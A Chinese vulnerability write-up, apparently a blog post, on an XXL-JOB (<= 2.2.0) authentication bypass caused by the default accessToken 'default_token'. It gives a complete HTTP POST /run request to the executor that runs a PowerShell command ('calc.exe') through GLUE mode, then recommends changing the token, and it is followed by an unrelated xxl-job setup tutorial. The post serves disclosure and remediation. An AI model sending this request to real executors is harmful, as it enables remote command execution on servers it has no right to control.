漏洞分析|XXL-JOB accessToken 存在身份认证绕过漏洞

1.漏洞描述

XXL-JOB是许雪里(XXL-JOB)社区的一款基于java语言的分布式任务调度平台。

2.影响版本

XXL-JOB <= 2.2.0

3.影响范围

4.漏洞分析

首先通过微步的漏洞通报说是

src/main/resources/application.properties

默认情况下是非空的,也就是xxl.job.accessToken=default_token

XXL-JOB 》GLUE模式(问题核心点):

        XXL-JOB为了灵活支持多语言以及脚本任务,提供了创新的 “GLUE模式”,该模式任务特点如下:

多语言支持:支持Java、Shell、Python、NodeJS、PHP、PowerShell……等类型。

Web IDE:任务以源码方式维护在调度中心,支持通过Web IDE在线开发、维护。

动态生效:用户在线通过Web IDE开发的任务代码,远程推送至执行器,实时加载执行。

查看官方文档可以看到执行器RESTful API中触发任务接口说明

其中的任务运行模式有以下几种

POST /run HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
XXL-JOB-ACCESS-TOKEN: default_token
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 365

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "SERIAL_EXECUTION",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_POWERSHELL",
  "glueSource": "calc.exe",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

5.修复建议

官方已修复该漏洞,建议用户修改调度中心和执行器配置项 xxl.job.accessToken 的默认值
参考链接:
https://www.xuxueli.com/xxl-job/#5.10%20%E8%AE%BF%E9%97%AE%E4%BB%A4%E7%89%8C%EF%BC%88AccessToken%EF%BC%89

  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
xxl-job 是一个分布式任务调度平台,可以帮助开发者快速搭建任务调度中心。下面是使用 xxl-job 的一般步骤: 1. 首先,你需要引入 xxl-job 的依赖。可以在项目的 pom.xml 文件中添加以下依赖: ```xml <dependency> <groupId>com.xxl-job</groupId> <artifactId>xxl-job-core</artifactId> <version>{latest version}</version> </dependency> ``` 你可以在 Maven 仓库中找到最新的版本号。 2. 创建一个任务执行器。在你的项目中创建一个类,并实现 `IJobHandler` 接口。这个接口有一个方法 `execute`,你需要在这个方法中编写你的任务逻辑。 ```java public class MyJobHandler extends IJobHandler { @Override public ReturnT<String> execute(String param) throws Exception { // 执行你的任务逻辑 System.out.println("Hello, xxl-job!"); return ReturnT.SUCCESS; } } ``` 3. 在你的项目中配置 xxl-job 的执行器。在 application.properties(或 application.yml)文件中添加以下配置: ```properties xxl.job.admin.addresses=http://admin_address xxl.job.executor.appname=myJobHandler xxl.job.executor.ip= xxl.job.executor.port=9999 xxl.job.accessToken= xxl.job.executor.logpath=/data/applogs/xxl-job/jobhandler xxl.job.executor.logretentiondays=3 ``` 其中 `admin_address` 是 xxl-job 的管理中心地址。 4. 启动 xxl-job 执行器。在项目启动时,需要初始化 xxl-job 的执行器,并注册到 xxl-job 的管理中心。 ```java public class Application { public static void main(String[] args) { // 初始化执行器 XxlJobExecutor executor = new XxlJobExecutor(); executor.setIp("executor_ip"); executor.setPort(9999); executor.setAppName("myJobHandler"); // 注册执行器到管理中心 XxlJobExecutor.registJobHandler("myJobHandler", new MyJobHandler()); // 启动执行器 executor.start(); } } ``` 以上就是使用 xxl-job 的一般步骤。当配置完成并启动执行器后,你可以在 xxl-job 的管理中心创建任务,并触发执行。执行器会定时向管理中心拉取任务,并执行你的逻辑代码。 请注意,以上只是简单介绍了 xxl-job 的使用步骤,具体的配置和使用方法还需要根据实际情况进行调整。你可以参考 xxl-job 官方文档获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值